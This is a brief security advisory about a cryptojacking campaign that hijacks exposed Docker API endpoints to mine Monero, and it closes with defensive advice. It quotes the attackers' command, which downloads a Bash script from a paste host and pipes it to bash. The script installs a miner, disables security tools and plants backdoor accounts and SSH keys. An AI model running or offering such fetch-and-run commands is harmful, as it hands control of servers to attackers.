A currently unidentified group is mass-scanning the internet attempting to discover Linux servers running Docker platforms that have their API endpoints exposed. The group is using the vulnerable endpoints to mine Monero digital currency. They are currently scanning more than 59,000 netblocks attempting to discover exposed Docker instances. Once a vulnerable instance has been identified, the group runs the command chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash; which downloads and runs a Bash script from the attacker’s server. The script then installs an XMRRig crypto-currency miner. In the two days that the campaign has been active, it appears that the hackers have already mined 14.82 Monero coins (XMR), which is approximately $740 USD. The group uninstalls known monitoring agents on the exposed Docker instances and kills a number of other processes. This includes shutting down not only security products but also processes associated with rival mining botnets. The script being run by the group also scans the infected host for Config files, which it then both encrypts and steals, installs backdoor accounts and leaves behind SSH keys for easier access to the infected host by the attackers.
While it may not seem like the group is pulling down much money for the wide net they are casting, it is important to remember that the campaign is still in its early days. As more hosts become infected, the group’s profits will grow at a sharper rate. It is important to review any Docker instances to ensure that API endpoints are not being exposed to the Internet unnecessarily. It is also best to review running processes on any Docker instances and stop any unknown processes. More details on this campaign can be found at https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/